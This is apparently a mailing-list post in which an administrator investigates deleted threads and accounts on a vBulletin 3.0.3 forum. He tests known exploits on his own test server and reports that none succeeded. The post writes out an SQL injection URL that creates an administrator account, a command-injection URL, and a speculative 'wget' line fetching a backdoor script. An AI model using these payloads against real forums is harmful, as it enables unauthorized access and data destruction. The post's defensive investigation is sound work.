testing vulnerable web application.

[Dave <fla.tech.talk () gmail com>]

pen testers,

Our companies website hosts a forum program called vBulletin 3.0.3. A 
few recent incidents (i.e. threads vanishing, user accounts deleted) has 
us looking into how this is happening. Our manager wants to solve this 
problem 'in house' so the task was given to me and another employee to 
see if we can figure out how this is happening and stop it.

1) We have closely monitored all (co)admin and moderators activities and 
this has revealed nothing out of the ordinary.

2) We restored the DB content using a backup and within 2 days the 
threads and accounts in question were gone again.

3) We downloaded and installed a patch from vbulletin.com that was 
supposed to secure the application but this has not stopped the problem.


We assumed the attacker was using some sort of SQL injection to alter 
the DB records or possibly he can craft a SQL query in a way that will 
create an admin account to use to simply log in and alter the records 
and then delete his username...NO rogue admin accounts have ever been 
found.

1) We searched the bugtraq lists at securityfocus.com and packetstorm 
for known SQL vulns for vBulletin

2) We set up a test server to test our theories without damaging the 
actual DB or interrupting normal business. The options granted to our 
vbulletin DB user are SELECT,UPDATE,ALTER,INSERT and DELETE so we set up 
our test DB with the same permissions etc...


In our search for possible vulns we came across these links:

http://packetstormsecurity.nl/0509-exploits/20050917-vbulletin-3.0.8.txt

When we try to test these POC snippets we dont get results. Examples we 
have tried:

USING example : 
admincp/user.php?do=find&orderby=username&limitnumber=[SQL]  we crafted 
a URL:


http://192.168.6.99:8080/vb-forums/admincp/user.php?do=find&orderby=username&limitnumber=[INSERT%20INTO%20user%20VALUES('12345',%20'6',%20'',%20'0',%20'admintest',%20'5f376e00eb11f00d0262636a5b699501',%20'2006-06-25',%20'nospam () nospam 
org',%20'0',%20'',%20'',%20'',%20'',%20'',%20'2',%20'Administrator',%20'0',%20'1151266933',%20'0',%20'1151272079',%20'1151274578',%20'1151267867',%20'1',%20'10',%20'1',%20'',%20'0',%20'0',%20'0',%20'2135',%20'',%20'0000-00-00',%20'-1',%20'1',%20'',%20'0',%20'0',%20'',%20'0',%20'0',%20'-1',%20'0',%20'0',%20'$Nu')]

The syntax for this SQL was obtained from the backup.sql file created by 
vBulletin. In theory this would create an account with following values:

userid = 12345
usergroupid = 6
username = admintest
password = 5f376e00eb11f00d0262636a5b699501        this = "password"
passworddate = 2006-06-25
email = nospam () nospam org
styleid = 0
usertitle = Administrator
reputation = 10
reputationlevelid = 1
options = 2135
salt = $Nu


Another example we tried:
URL of vuln listing: 
http://packetstormsecurity.nl/0502-exploits/vbulletin-3.0.4-2.txt

Reading this we wondered if the attacker was possibly running a command 
on the server (such as wget http://foobar.com/backdoor.script) then 
using this backdoor script he is able to view source code of DB related 
scripts to obtain info for DB access etc...

We have tried using both the POC code and self crafted URL's like:
http://192.168.6.99:8080/vb-forums/forumdisplay.php?GLOBALS[]=1&f=1&comma=".`echo 
_START_`.`'touch test.txt'`.`echo _END_`."
> then
http://192.168.6.99:8080/vb-forums/test.txt    
> 404 error file not found

This is just a small list of unfruitful examples gathered during a 
rather exhaustive effort to exploit this application. To date we were 
not able to successfully exploit the vBulletin application using any of 
the available POC code snippets. We were hoping that someone out there 
who is more proficient at this line of work could shed some light on our 
situation and possibly point us in the right direction.


Thanks in advance for any suggestions.
Dave



------------------------------------------------------------------------------
This List Sponsored by: Cenzic

Concerned about Web Application Security? 
Why not go with the #1 solution - Cenzic, the only one to win the Analyst's 
Choice Award from eWeek. As attacks through web applications continue to rise, 
you need to proactively protect your applications from hackers. Cenzic has the 
most comprehensive solutions to meet your application security penetration 
testing and vulnerability management needs. You have an option to go with a 
managed service (Cenzic ClickToSecure) or an enterprise software 
(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can 
help you: http://www.cenzic.com/news_events/wpappsec.php 
And, now for a limited time we can do a FREE audit for you to confirm your 
results from other product. Contact us at request () cenzic com for details.
------------------------------------------------------------------------------